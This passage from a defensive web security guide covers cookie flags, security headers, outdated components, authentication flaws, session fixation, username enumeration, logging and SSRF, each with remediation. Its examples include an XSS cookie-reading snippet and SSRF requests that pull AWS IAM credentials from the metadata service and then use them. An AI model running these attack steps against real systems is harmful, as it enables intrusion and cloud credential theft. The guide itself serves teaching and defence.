    • Periodically scan your TLS configuration with security tools to see which ciphers or protocol versions might reveal underlying server libraries.

Cookie Flags

Description

Cookie Flags are security attributes that can be set on HTTP cookies to control their behavior and reduce security risks. Improperly configured cookie flags can leave an application vulnerable to various attacks, such as session hijacking, cross-site scripting (XSS) exploitation, and man-in-the-middle (MitM) attacks. Without the correct flags, an attacker might be able to steal authentication cookies, manipulate session data, or execute unauthorized actions on behalf of a user.

Cookies are often used for authentication (e.g., session tokens), user preferences, or tracking. Ensuring that security flags are set correctly is crucial for preventing unauthorized access and data leakage.

Examples

Missing HttpOnly Flag

If the HttpOnly flag is not set, JavaScript running in the user's browser can access the cookie via document.cookie. This makes it possible for an attacker to steal the session token using an XSS attack:

<script>
  alert(document.cookie);
</script>

If the session cookie is accessible in JavaScript, an attacker could exfiltrate it and hijack the session.

Missing Secure Flag

If a cookie lacks the Secure flag, it can be transmitted over unencrypted HTTP connections. This makes it susceptible to packet sniffing or MitM attacks, where an attacker intercepts the cookie data.

Example of an insecure cookie:

Set-Cookie: sessionid=abcd1234; Path=/; HttpOnly;

Without Secure, the cookie is sent over both HTTP and HTTPS. If an attacker can force the user to make an HTTP request, they might capture the cookie.

Missing SameSite Flag

The SameSite flag prevents Cross-Site Request Forgery (CSRF) attacks by restricting when cookies are sent with cross-site requests. If this flag is not set or is configured as SameSite=None without Secure, attackers can exploit CSRF vulnerabilities to perform actions on behalf of an authenticated user.

Example of a cookie missing the SameSite flag:

Set-Cookie: sessionid=abcd1234; Path=/; Secure; HttpOnly;

In this case, the cookie may still be sent with cross-site requests, allowing CSRF attacks.

Remediation

  1. Set HttpOnly to Prevent XSS-Based Theft

    • Ensures cookies are not accessible via JavaScript, preventing attackers from stealing session tokens through XSS.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/; HttpOnly;
    
  2. Use Secure to Encrypt Cookie Transmission

    • Ensures the cookie is only sent over HTTPS and prevents interception over unencrypted HTTP traffic.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/; Secure; HttpOnly;
    
  3. Enforce SameSite for CSRF Protection

    • Use SameSite=Lax or SameSite=Strict to prevent cross-site cookie transmission, mitigating CSRF attacks.
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/; Secure; HttpOnly; SameSite=Lax;
    
  4. Set Domain and Path Restrictions

    • Limit cookies to specific subdomains or paths to reduce the risk of unauthorized access (see the framework-level sketch below).
    • Example:
    Set-Cookie: sessionid=abcd1234; Path=/account; Secure; HttpOnly; SameSite=Strict;
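
These attributes can also be applied centrally at the framework level rather than on individual Set-Cookie headers. A minimal Flask sketch (Flask is assumed; the secret key is a placeholder) that sets the flags for the session cookie:

from flask import Flask, session

app = Flask(__name__)
app.secret_key = "change-me"               # placeholder; load from secure configuration

app.config.update(
    SESSION_COOKIE_HTTPONLY=True,          # block JavaScript access
    SESSION_COOKIE_SECURE=True,            # send only over HTTPS
    SESSION_COOKIE_SAMESITE="Lax",         # limit cross-site sending
)

@app.route("/login")
def login():
    session["user"] = "alice"              # the cookie is issued with the flags above
    return "logged in"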
    

HTTP Headers

Description

HTTP Headers play a crucial role in web security by providing additional metadata about requests and responses between clients and servers. Misconfigured, missing, or weak security headers can expose web applications to various attacks, such as Cross-Site Scripting (XSS), Clickjacking, Man-in-the-Middle (MitM) attacks, and data leaks. Properly setting HTTP headers enhances the security posture of an application by enforcing secure communication, restricting browser behaviors, and mitigating common web vulnerabilities.

Without correctly configured security headers, attackers can manipulate responses, inject malicious scripts, or exploit browser-side weaknesses to compromise users and sensitive data.

Examples

Missing Strict-Transport-Security (HSTS)

The HTTP Strict Transport Security (HSTS) header ensures that browsers only connect to a site over HTTPS, preventing downgrade attacks and MitM attacks:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

If this header is missing, an attacker can force a user to visit the HTTP version of the site and intercept or alter the traffic.

Missing X-Frame-Options (Clickjacking Protection)

If an application allows framing inside <iframe> elements, attackers can create Clickjacking attacks that trick users into interacting with hidden UI elements.

To prevent this, the following header should be set:

X-Frame-Options: DENY

Without this, an attacker can embed the site within a malicious page and hijack user actions.

Missing X-Content-Type-Options (MIME Sniffing Attack Prevention)

Some browsers try to detect the content type of files even if the Content-Type header is present. This behavior, known as MIME sniffing, can be exploited to execute malicious scripts.

To prevent this, the following header should be set:

X-Content-Type-Options: nosniff

Without this, attackers can trick browsers into executing non-script files as JavaScript.

Weak or Missing Content-Security-Policy (XSS Prevention)

A missing Content Security Policy (CSP) allows attackers to inject malicious scripts via Cross-Site Scripting (XSS).

A strong CSP header should look like:

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random123'; object-src 'none'

Without this, malicious scripts injected into the site may execute in users' browsers.

Remediation

  1. Enforce HTTPS with HSTS

    • Prevents protocol downgrade attacks by ensuring all traffic is over HTTPS.
    • Recommended setting:
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    
  2. Prevent Clickjacking with X-Frame-Options

    • Blocks embedding of the site in iframes to prevent UI redress attacks.
    • Recommended setting:
    X-Frame-Options: DENY
    
  3. Block MIME Sniffing with X-Content-Type-Options

    • Ensures the browser respects declared Content-Type and doesn't execute non-script files as scripts.
    • Recommended setting:
    X-Content-Type-Options: nosniff
    
  4. Mitigate XSS with Content-Security-Policy

    • Restricts allowed sources for scripts, styles, and other content.
    • Example policy:
    Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random123'; object-src 'none'
    
  5. Enable Referrer-Policy for Privacy Protection

    • Controls how much referrer information is sent when navigating between sites (a combined sketch setting all of these headers follows below).
    • Recommended setting:
    Referrer-Policy: strict-origin-when-cross-origin
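
These headers can be set in one place at the application or reverse-proxy layer. A minimal Flask sketch (Flask is assumed, and the CSP value is illustrative) that attaches them to every response:

from flask import Flask

app = Flask(__name__)

@app.after_request
def set_security_headers(resp):
    resp.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
    resp.headers["X-Frame-Options"] = "DENY"
    resp.headers["X-Content-Type-Options"] = "nosniff"
    resp.headers["Content-Security-Policy"] = "default-src 'self'"
    resp.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
    return resp

@app.route("/")
def index():
    return "ok"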
    

Vulnerable and Outdated Components

Vulnerable and Outdated Components occur when applications rely on deprecated, unpatched, or insecure third-party libraries, frameworks, or dependencies, exposing them to known vulnerabilities. Attackers exploit these weaknesses to execute arbitrary code, escalate privileges, steal data, or compromise entire systems. Failing to update or patch components increases the risk of supply chain attacks and software exploits.

Common Vulnerabilities:

- Using Outdated or Unsupported Software with Known CVEs 
  (Common Vulnerabilities and Exposures)
- Failure to Apply Security Patches or Updates for Third-Party Libraries
- Relying on End-of-Life (EOL) Components No Longer Receiving Security Updates
- Use of Insecure Dependencies in Package Managers (e.g., npm, pip, Maven)
- Including Unverified or Malicious Third-Party Plugins, SDKs, or APIs
- Failure to Monitor for Security Advisories or Dependency Vulnerabilities

To mitigate these risks, organizations should regularly update software components, use automated dependency scanning tools (e.g., OWASP Dependency-Check, Snyk, Dependabot), verify the integrity of third-party packages, and apply security patches as soon as they are released. Implementing Software Composition Analysis (SCA) and enforcing strict version control policies can further reduce the risk of vulnerable components.

Usage of Vulnerable Components

Description

The Usage of Vulnerable Components occurs when an application incorporates third-party libraries, frameworks, plugins, or system dependencies that contain known security flaws. These components, whether open-source or proprietary, may have documented vulnerabilities (CVEs) that attackers can exploit to compromise applications, steal data, or execute malicious code.

Many organizations rely on third-party components for faster development, but failing to monitor and update them can introduce severe security risks. Attackers commonly scan applications for outdated versions of popular libraries or dependencies, using public exploit databases to identify known weaknesses. If these vulnerable components are not patched or replaced, an attacker may gain unauthorized access, execute arbitrary code, or manipulate system behavior.

Examples

Outdated Web Frameworks

Using an old version of a web framework can introduce serious vulnerabilities:

  • Spring Framework (Java) – Remote Code Execution (CVE-2022-22965)
    • An application using Spring 5.3.0 may be vulnerable to the Spring4Shell RCE exploit, allowing attackers to execute arbitrary code on the server.
  • Django – Account Takeover via Password Reset (CVE-2019-19844)
    • Django versions before 1.11.27, 2.2.9, and 3.0.1 allowed account takeover: the password reset flow matched email addresses case-insensitively, so a crafted Unicode address could cause another user's reset token to be delivered to the attacker.

Vulnerable JavaScript Libraries (XSS & Prototype Pollution)

Front-end applications using outdated JavaScript libraries may be vulnerable to Cross-Site Scripting (XSS) or Prototype Pollution:

  • jQuery versions < 3.5.0
    • Vulnerable to XSS injection if unsanitized user input is passed to html().
  • Lodash versions < 4.17.21
    • Susceptible to Prototype Pollution, allowing attackers to modify object properties and potentially execute malicious scripts.

Unpatched System Components

Server-side components such as database systems, middleware, or web servers can also introduce vulnerabilities:

  • Apache Log4j (CVE-2021-44228 – Log4Shell)
    • A critical Remote Code Execution (RCE) vulnerability in Log4j versions < 2.15.0 allowed attackers to take control of affected servers by injecting malicious payloads in logs.
  • OpenSSL (CVE-2014-0160 – Heartbleed)
    • The infamous Heartbleed vulnerability allowed attackers to read sensitive server memory, including private keys, from systems running OpenSSL 1.0.1 through 1.0.1f.

Remediation

  1. Monitor and Update Dependencies Regularly

    • Use dependency management tools to track and update vulnerable components:
      • npm audit fix (Node.js)
      • pip list --outdated (Python)
      • mvn versions:display-dependency-updates (Java Maven)
    • Ensure libraries and frameworks are updated to the latest stable versions.
  2. Conduct Regular Vulnerability Scans

    • Use Software Composition Analysis (SCA) tools to detect and manage vulnerable components:
      • OWASP Dependency-Check (Java, .NET, Python)
      • Snyk (Multiple languages)
      • GitHub Dependabot (Automated alerts for outdated dependencies)
  3. Replace Deprecated or Unmaintained Components

    • Avoid using libraries or frameworks that are no longer actively maintained.
    • If a component is unsupported, migrate to a more secure alternative.
  4. Implement Strict Version Control

    • Use dependency pinning (package-lock.json, requirements.txt) to prevent unintentional updates to vulnerable versions.
    • Avoid using wildcard versions (*, latest) in package management files.
  5. Apply Security Patches Immediately

    • Monitor security bulletins and CVE reports for critical updates affecting your software stack.
    • Automate patch management to reduce exposure to zero-day exploits.
  6. Enforce Secure Code Review and Testing

    • Integrate vulnerability detection into CI/CD pipelines to prevent deploying applications with known vulnerabilities (a minimal version-check sketch follows this list).
    • Perform manual security reviews of third-party components before integrating them into production.
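
As a complement to the scanners above, the following minimal Python sketch shows the shape of a CI gate that compares installed packages against known-fixed releases. The package names and version thresholds are purely illustrative, and the third-party packaging library is assumed to be installed.

from importlib.metadata import PackageNotFoundError, version

from packaging.version import Version  # third-party 'packaging' library, assumed installed

# Illustrative thresholds only; maintain these from real security advisories
KNOWN_FIXED = {"requests": "2.31.0", "jinja2": "3.1.3"}

for pkg, fixed in KNOWN_FIXED.items():
    try:
        installed = Version(version(pkg))
    except PackageNotFoundError:
        continue                   # package not used by this project
    if installed < Version(fixed):
        print(f"{pkg} {installed} is older than the known-fixed release {fixed}")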

Identification and Authentication Failures

Identification and Authentication Failures occur when an application improperly implements authentication mechanisms, allowing attackers to compromise user accounts, bypass authentication, or exploit weak credentials. These vulnerabilities often result from weak password policies, missing multi-factor authentication (MFA), improper session management, or insecure credential storage, leading to unauthorized access, account takeovers, and data breaches.

Common Vulnerabilities:

- Weak Password Policies (Allowing Short, Predictable, or Reused Passwords)
- Missing or Improperly Enforced Multi-Factor Authentication (MFA)
- Brute-Force or Credential Stuffing Due to Lack of Rate Limiting
- Session Fixation or Session Hijacking Due to Poor Session Management
- Exposed or Hardcoded Credentials in Source Code or Configuration Files
- Improperly Implemented Password Reset or Recovery Mechanisms Allowing 
  Account Takeovers

To mitigate these risks, applications should enforce strong password policies, implement MFA for critical actions, use secure session management practices (e.g., regenerating session IDs after login), and protect stored credentials using strong hashing algorithms (bcrypt, Argon2, PBKDF2). Additionally, monitoring authentication logs for suspicious activity and implementing rate-limiting mechanisms can help prevent brute-force and automated attacks.

Weak Password Policy

Description

A Weak Password Policy occurs when an application allows users or system administrators to create passwords that are easy to guess, short, or lack complexity, increasing the risk of brute-force attacks, credential stuffing, and unauthorized access. Weak password policies often result in users choosing predictable passwords (e.g., "123456", "password", or "qwerty"), which attackers can crack in seconds using automated tools.

A weak password policy also includes practices such as allowing password reuse, not enforcing expiration policies, and failing to implement multi-factor authentication (MFA). Without proper controls, an attacker who obtains or guesses a single credential can compromise multiple user accounts and sensitive systems.

Examples

Allowing Simple or Common Passwords

An application that does not enforce password complexity may allow users to set weak passwords such as:

  • password
  • 12345678
  • qwerty123
  • admin

Attackers can easily guess or brute-force these passwords using automated tools like Hydra, John the Ripper, or hashcat.

No Multi-Factor Authentication (MFA)

If an application relies solely on password-based authentication without requiring an additional factor (e.g., OTP, biometric, or hardware key), an attacker who steals or cracks a password can fully take over an account.

Lack of Account Lockout or Rate Limiting

A system that does not limit login attempts allows attackers to brute-force a password indefinitely. For example:

POST /login
username=admin&password=admin123

Without a rate-limiting mechanism, an attacker can script thousands of attempts per second until they find a correct combination.
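
A minimal Python sketch of a per-account lockout check (in-memory and illustrative only; a real deployment would use a shared store such as Redis and combine this with per-IP limits and CAPTCHAs):

import time

FAILED_ATTEMPTS = {}        # username -> timestamps of recent failures
MAX_ATTEMPTS = 5
WINDOW_SECONDS = 300        # 5-minute sliding window

def allow_login_attempt(username: str) -> bool:
    now = time.time()
    recent = [t for t in FAILED_ATTEMPTS.get(username, []) if now - t < WINDOW_SECONDS]
    FAILED_ATTEMPTS[username] = recent
    return len(recent) < MAX_ATTEMPTS

def record_failed_login(username: str) -> None:
    FAILED_ATTEMPTS.setdefault(username, []).append(time.time())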

Allowing Password Reuse or No Expiration

If users can reuse old passwords, attackers can use previously leaked credentials in credential stuffing attacks. Without expiration policies, a password might remain unchanged for years, giving attackers more time to compromise accounts.

Remediation

  1. Enforce Strong Password Requirements

    • Require passwords to be at least 10-16 characters long, depending on account sensitivity.
    • Mandate a mix of uppercase, lowercase, numbers, and special characters.
    • Prevent the use of common passwords by checking against leaked password databases (e.g., Have I Been Pwned API).
  2. Implement Multi-Factor Authentication (MFA)

    • Enforce MFA for high-privilege accounts and sensitive actions.
    • Support TOTP (Time-Based One-Time Passwords), biometric authentication, or hardware security keys.
  3. Apply Rate Limiting and Account Lockouts

    • Lock accounts temporarily after 5-10 failed login attempts.
    • Implement progressive delays (e.g., increasing wait time after each failed attempt).
    • Use CAPTCHAs for login forms to block automated brute-force attempts.
  4. Enforce Password Expiration and Rotation

    • Require users to change passwords periodically (e.g., every 90 days for critical accounts).
    • Prevent the reuse of previous 5-10 passwords to stop credential cycling.
  5. Use Secure Password Hashing Algorithms

    • Store passwords securely using bcrypt, Argon2, or PBKDF2 with strong salting.
    • Avoid outdated or insecure hashing methods like MD5 or SHA-1.

Session Fixation

Description

Session Fixation is a vulnerability where an attacker forces a user to use a known session ID, allowing the attacker to hijack the session after the user logs in. This attack is possible when the application fails to issue a new session ID after authentication, enabling an attacker to set a session ID before login and then reuse it once the victim authenticates.

Additionally, if sessions remain valid after logout, attackers who obtain a valid session ID can continue accessing a user's account even after the user logs out. This happens when the application fails to invalidate sessions properly on logout, leaving them active for further use.

By exploiting session fixation, attackers can impersonate legitimate users, gaining unauthorized access to sensitive actions or personal data.

Examples

Setting a Fixed Session ID Before Login

  1. Attacker generates a session ID:

    GET /login
    Set-Cookie: JSESSIONID=123456
    
  2. Attacker tricks the victim into using this session ID

    • By embedding the session ID in a phishing link:

      https://example.com/login;JSESSIONID=123456
      
    • By injecting a session ID in a cookie via Cross-Site Scripting (XSS).

  3. Victim logs in using the attacker's session ID

    • The session remains unchanged after login.
  4. Attacker now has access to the victim's authenticated session

    • Since the session ID remains the same before and after login, the attacker can use JSESSIONID=123456 to access the victim's account.

Session Remains Valid After Logout

Some applications fail to properly invalidate session tokens when a user logs out. In such cases:

  1. User logs in and gets a session token:

    Set-Cookie: sessionid=abcd1234; HttpOnly; Secure
    
  2. Attacker steals the session ID (e.g., via XSS, session fixation, or network sniffing).

  3. User logs out, expecting the session to be invalidated.

  4. Attacker reuses the same session token after logout:

    GET /dashboard
    Cookie: sessionid=abcd1234
    
    • If the server does not invalidate the session properly, the attacker still has access.

Remediation

  1. Regenerate Session ID After Login

    • Immediately issue a new session ID upon authentication to prevent session fixation.

    • In PHP:

      session_regenerate_id(true);
      
    • In Java (Spring Security):

      http.sessionManagement().sessionFixation().newSession();
      
  2. Invalidate Session Properly on Logout

    • Ensure the session is fully destroyed on logout:

      session_destroy();
      
    • Remove session cookies in HTTP headers:

      Set-Cookie: sessionid=deleted; expires=Thu, 01 Jan 1970 00:00:00 GMT; Secure; HttpOnly
      
  3. Set Secure Cookie Attributes

    • Use HttpOnly, Secure, and SameSite attributes to protect session cookies:

      Set-Cookie: JSESSIONID=abcd1234; HttpOnly; Secure; SameSite=Strict
      
  4. Implement Session Timeout and Expiry

    • Automatically expire inactive sessions to prevent hijacking.
    • Enforce session expiration after a fixed time (e.g., 30 minutes of inactivity).
  5. Restrict Session Sharing Across Devices

    • Implement device fingerprinting or IP binding to limit session use to the originating device.

Username Enumeration

Description

Username Enumeration occurs when an attacker can determine whether a specific username exists within an application by analyzing different system responses. This vulnerability allows attackers to compile lists of valid usernames, making brute-force attacks, credential stuffing, and social engineering attacks more effective.

Applications commonly expose username enumeration vulnerabilities through login forms, password reset pages, registration checks, and API responses. If an application provides different error messages or response times based on whether a username exists, an attacker can use this information to confirm valid user accounts before launching targeted attacks.

Examples

Login Form with Distinct Responses

A vulnerable login form may return different messages depending on whether the username exists:

Valid Username, Wrong Password

POST /login
username=admin&password=wrongpassword

Response:

"Invalid password."

(Indicates that "admin" exists)

Non-Existent Username

POST /login
username=notrealuser&password=wrongpassword

Response:

"User does not exist."

(Confirms that "notrealuser" is not a registered account)

Attackers can exploit this behavior to compile a list of valid usernames.

Password Reset Function with Different Messages

If the password reset feature leaks username information, an attacker can probe email addresses or usernames:

POST /reset-password
email=victim@example.com

Responses:

  • "Password reset link sent to your email" → (Valid email confirmed)
  • "No account found with this email" → (Invalid email revealed)

Timing Attacks on API Authentication

Even if error messages are generic, differences in server response time can indicate whether a username is valid. For example:

  • Valid username: Response time 250ms
  • Invalid username: Response time 50ms

Attackers can measure these delays and infer which usernames exist.
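
Both side channels, distinct messages and timing differences, can be closed in application code. A minimal Flask sketch (Flask and bcrypt are assumed, and the in-memory user store is hypothetical) that always performs a hash comparison and always returns the same error message:

import bcrypt
from flask import Flask, jsonify, request

app = Flask(__name__)

# Hypothetical user store: username -> bcrypt hash
USERS = {"alice": bcrypt.hashpw(b"s3cret-passphrase", bcrypt.gensalt())}
DUMMY_HASH = bcrypt.hashpw(b"placeholder", bcrypt.gensalt())

@app.route("/login", methods=["POST"])
def login():
    username = request.form.get("username", "")
    password = request.form.get("password", "").encode()
    stored = USERS.get(username, DUMMY_HASH)
    # Always run the comparison so unknown usernames take about as long as known ones
    valid = bcrypt.checkpw(password, stored) and username in USERS
    if valid:
        return jsonify(message="Welcome")
    # One generic message regardless of whether the username exists
    return jsonify(error="Invalid login credentials."), 401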

Remediation

  1. Use Generic Error Messages

    • Ensure that authentication and password reset responses do not distinguish between valid and invalid usernames.
    • Use a generic message for all cases:
      • "Invalid login credentials."
      • "If the account exists, you will receive a password reset email."
  2. Normalize Response Times

    • Prevent timing attacks by ensuring that authentication and account-related requests take a constant response time, regardless of whether the username exists.
  3. Implement Rate Limiting and Monitoring

    • Restrict login and reset attempts per IP address or session (e.g., 5 attempts per minute).
    • Use Web Application Firewalls (WAF) to detect and block automated enumeration attempts.
  4. Require CAPTCHA on Sensitive Endpoints

    • Implement CAPTCHAs on login, registration, and password reset pages to mitigate automated username enumeration.

Software and Data Integrity Failures

Software and Data Integrity Failures occur when applications do not properly verify the integrity of software updates, critical data, or dependencies, allowing attackers to inject malicious code, tamper with sensitive data, or exploit untrusted sources. This can lead to remote code execution (RCE), data corruption, supply chain attacks, and unauthorized modifications to application behavior.

Common Vulnerabilities:

- Lack of Digital Signatures or Hash Validation for Software Updates
- Use of Untrusted or Compromised Third-Party Libraries, Plugins, or Packages
- Tampering with Configuration Files, Logs, or Critical System Data
- Unsecured Continuous Integration/Continuous Deployment (CI/CD) Pipelines
- Malicious Dependency Injection (Supply Chain Attacks)
- Failure to Enforce Integrity Controls for Data Stored in Databases or Caches

To mitigate these risks, applications should use cryptographic signatures to verify software integrity, restrict third-party dependencies to trusted sources, implement secure CI/CD pipelines, and protect critical data from unauthorized modifications using hashing, access controls, and tamper-detection mechanisms. Regular audits and dependency monitoring can further reduce the risk of software and data integrity failures.

Data Tampering

Security Logging and Monitoring Failures

Security Logging and Monitoring Failures occur when an application does not adequately record, analyze, or respond to security-relevant events, allowing attackers to operate undetected. Without proper logging and monitoring, organizations may fail to detect breaches, track suspicious activity, or respond to incidents in a timely manner, leading to data theft, system compromise, or prolonged attacker persistence.

Common Vulnerabilities:

- Lack of Logging for Critical Events (e.g., Logins, Failed Authentication Attempts,
  Privilege Escalations)
- Failure to Detect or Alert on Repeated Brute-Force or Unauthorized Access Attempts
- Logs That Lack Sufficient Detail (e.g., Missing Timestamps, User IDs, IP Addresses)
- Storing Logs in Insecure Locations, Allowing Attackers to Modify or Delete Evidence
- No Real-Time Monitoring or Automated Alerting on Security Events
- Overwhelming False Positives or Alert Fatigue, Causing Legitimate Threats to Be
  Ignored

To mitigate these risks, organizations should enable logging for authentication and critical system events, securely store and protect logs from tampering, implement real-time monitoring with alerting mechanisms, and regularly review logs to detect anomalies. Using Security Information and Event Management (SIEM) solutions and setting up proactive incident response workflows can significantly improve security visibility and threat detection.

Insufficient Logging and Monitoring

Description

Insufficient Logging and Monitoring occurs when an application fails to adequately record, store, or analyze security-related events, making it difficult to detect and respond to intrusions, fraud, data breaches, or malicious activity. Without proper logging, attackers can operate undetected for long periods, potentially compromising sensitive data or escalating privileges without being noticed.

Inadequate monitoring may also result in delayed or missing alerts for brute-force attacks, privilege escalations, unauthorized access, or API abuses. Even when logs are recorded, if they are not protected from tampering, stored securely, and regularly reviewed, they lose their value in forensic investigations and incident response.

Examples

Lack of Login and Authentication Event Logging

An application that does not log successful and failed login attempts allows attackers to perform brute-force attacks or credential stuffing without detection.

POST /login
username=admin&password=wrongpassword

No log entry is created, making it impossible to detect repeated failed login attempts.
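
A minimal sketch using Python's standard logging module to record every attempt with the fields needed for later correlation, and nothing sensitive:

import logging

logging.basicConfig(
    filename="auth.log",
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(message)s",
)
auth_log = logging.getLogger("auth")

def log_login_attempt(username: str, source_ip: str, success: bool) -> None:
    # Record who, from where, and the outcome; never the submitted password
    auth_log.info(
        "login attempt user=%s ip=%s status=%s",
        username, source_ip, "SUCCESS" if success else "FAILED",
    )

log_login_attempt("admin", "192.168.1.10", success=False)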

No Logging of Privileged Actions

If an application does not log privileged user actions, an attacker or insider threat may modify account roles, change configurations, or delete data without being detected.

Example: An admin creates a new user with superuser privileges, but the event is not logged.

Failure to Monitor API and Sensitive Requests

APIs that handle financial transactions, password changes, or authentication tokens should log relevant activity. Without this, an attacker can transfer funds, change credentials, or manipulate requests without detection.

POST /update-balance
{ "user": "attacker", "balance": "9999999" }

If the API does not log this request, fraud detection systems cannot flag it.

Logs Are Stored But Not Monitored

Even if logs are generated, failing to actively monitor them allows real-time attacks to go unnoticed. Without automated alerts, security teams must manually sift through logs—often too late.

Remediation

  1. Implement Comprehensive Logging

    • Log all authentication events (successful logins, failed attempts, password resets).
    • Capture privileged actions (admin access, permission changes, financial transactions).
    • Include API activity logs for sensitive operations.
  2. Use Secure and Tamper-Proof Log Storage

    • Store logs in append-only formats or write-once storage (WORM) to prevent attackers from deleting traces of their activity.
    • Use log integrity mechanisms such as cryptographic signing or HMAC to prevent log tampering.
  3. Enable Real-Time Monitoring and Alerts

    • Integrate logs with Security Information and Event Management (SIEM) solutions like Splunk, ELK Stack, or Wazuh.
    • Set up alerts for suspicious activity (e.g., repeated failed logins, privilege escalations, unusual API requests).
  4. Mask or Encrypt Sensitive Data in Logs

    • Avoid logging plaintext credentials, API keys, or personal data.

    • Example of secure logging:

      [INFO] User login attempt: user=admin, IP=192.168.1.10, status=FAILED
      
    • Example of insecure logging:

      [DEBUG] User login: username=admin, password=admin123
      
  5. Regularly Review and Audit Logs

    • Conduct periodic log analysis to detect anomalies.
    • Use machine learning or behavioral analytics to spot patterns of compromise.
  6. Ensure Log Retention Policies

    • Retain logs for 6-12 months to support forensic investigations.
    • Apply log rotation and archiving to maintain storage efficiency.

Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) occurs when an attacker tricks a vulnerable server into making unauthorized requests to internal or external resources. This can lead to data exfiltration, internal network scanning, cloud metadata exposure, and service exploitation. SSRF is particularly dangerous when applications allow user-controlled URLs or fail to restrict outgoing requests.

Common Vulnerabilities:

- Fetching External URLs Without Proper Validation (e.g., allowing arbitrary URLs in
  request parameters)
- Accessing Internal Services (e.g., databases, admin panels, cloud metadata APIs)
- SSRF-Based AWS Credentials Theft via the Instance Metadata Service (IMDS)
- Bypassing Network Restrictions to Exploit Internal Systems
- Interacting with Cloud Services (e.g., Kubernetes, Docker APIs) to Gain Unauthorized
  Access
- Forcing the Application to Perform Malicious Actions on Other Services

To mitigate these risks, applications should validate and restrict user-supplied URLs, enforce allowlists for outgoing requests, block access to internal IP ranges (e.g., 127.0.0.1, 169.254.169.254), and use metadata service version 2 (IMDSv2) in AWS environments. Additionally, logging and monitoring outbound requests can help detect and prevent SSRF exploitation attempts.

Server-Side Request Forgery (SSRF) – AWS Credentials Theft

Description

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a vulnerable server to make unauthorized HTTP requests to internal or external services. When SSRF is exploited in cloud environments like AWS, attackers can query internal metadata endpoints to steal sensitive credentials, such as IAM role access keys, allowing them to gain control over AWS resources.

AWS instances use the Instance Metadata Service (IMDS), which provides temporary security credentials to applications running inside EC2 instances. If an application vulnerable to SSRF can make internal HTTP requests, attackers can access this metadata and extract AWS credentials, leading to privilege escalation, data exfiltration, and full account compromise.

Examples

Exploiting SSRF to Access AWS Metadata

A vulnerable web application allows users to fetch remote URLs by supplying an arbitrary URL parameter:

GET /fetch?url=https://example.com

If the application does not properly validate user-supplied URLs, an attacker can redirect the request to AWS IMDS:

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Attack Steps

  1. The attacker sends a request to fetch data from AWS's metadata service (169.254.169.254).
  2. The response exposes the available IAM roles assigned to the EC2 instance.
  3. The attacker then retrieves temporary AWS access keys:

    GET http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role

  4. The response returns credentials:

    {
      "AccessKeyId": "AKIAEXAMPLE123",
      "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
      "Token": "FQoGZXIvYXdzEXAMPLE...",
      "Expiration": "2025-03-31T12:00:00Z"
    }

  5. The attacker now has valid AWS credentials and can:

    • List and steal S3 buckets (the AWS CLI reads the stolen keys from environment variables):

      AWS_ACCESS_KEY_ID=AKIAEXAMPLE123 \
      AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY \
      AWS_SESSION_TOKEN=FQoGZXIvYXdzEXAMPLE... \
      aws s3 ls

    • Create or delete EC2 instances, modify IAM roles, or exfiltrate data.

Remediation

  1. Block Requests to AWS Metadata Service

    • Implement firewall rules or network policies to prevent access to 169.254.169.254 from the application.
    • In AWS, disable IMDSv1 (which answers plain GET requests and is therefore easy to reach through SSRF) and require IMDSv2, which demands a session token obtained via a PUT request:
    aws ec2 modify-instance-metadata-options --instance-id i-1234567890abcdef0 --http-endpoint enabled --http-tokens required
    
  2. Validate and Restrict Outbound Requests

    • Whitelist only trusted domains for user-supplied URLs.
    • Reject requests containing IP addresses, localhost, or internal services.
    • Example regex to filter external URLs:
    ^(https?:\/\/(www\.)?trusted-domain\.com\/.*)$
    
  3. Use IAM Role Restrictions

    • Assign least privilege IAM roles to EC2 instances to limit access to AWS resources.
    • Block sensitive actions (e.g., s3:ListBuckets, iam:PassRole) in IAM policies.
  4. Enforce Network Segmentation

    • Use VPC Security Groups and NACLs (Network ACLs) to restrict instance communication with internal services.
    • Ensure EC2 instances cannot make arbitrary requests to internal services.

Server-Side Request Forgery (SSRF) – Internal Network Access

Description

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a vulnerable server into making unauthorized HTTP requests to internal or external services. When SSRF is used to access internal networks, attackers can scan internal systems, query sensitive services, or exploit insecure internal applications that are not meant to be publicly accessible.

Many internal applications, databases, admin panels, and cloud metadata services are only accessible from within the network and are not exposed to the internet. However, if an application is vulnerable to SSRF, an attacker can use it as a proxy to bypass firewall restrictions, gaining access to internal assets, cloud services, and critical infrastructure.

Examples

Scanning Internal Network Services

A vulnerable application allows users to fetch external URLs, but it does not validate input properly:

GET /fetch?url=https://example.com

An attacker can scan the internal network by changing the URL parameter to query local IP ranges:

GET /fetch?url=http://192.168.1.1

If the server responds with 200 OK, the attacker confirms that an internal service is running on 192.168.1.1.

Accessing Internal Applications

Some enterprises host internal admin panels, monitoring dashboards, or databases at private IP addresses (e.g., 10.0.0.1, 192.168.1.1). If an SSRF vulnerability exists, an attacker can access these services.

Example: Accessing an Internal Jenkins Server

GET /fetch?url=http://10.0.0.5:8080

  • If Jenkins is running internally, the attacker may reach the admin login panel.
  • If no authentication is required, the attacker may run commands on the internal CI/CD pipeline.

Querying Cloud Services (Kubernetes, Docker APIs)

In cloud environments, SSRF can be used to query internal APIs, such as:

  • Kubernetes API Server (https://10.0.0.1:6443)
  • Docker Remote API (http://localhost:2375)
  • AWS Metadata Service (http://169.254.169.254/latest/meta-data/)

Example: Listing Kubernetes Pods

GET /fetch?url=https://10.0.0.1:6443/api/v1/namespaces/default/pods

If the Kubernetes API is misconfigured, the attacker might retrieve internal pod names and container metadata.

Bypassing Network Access Controls

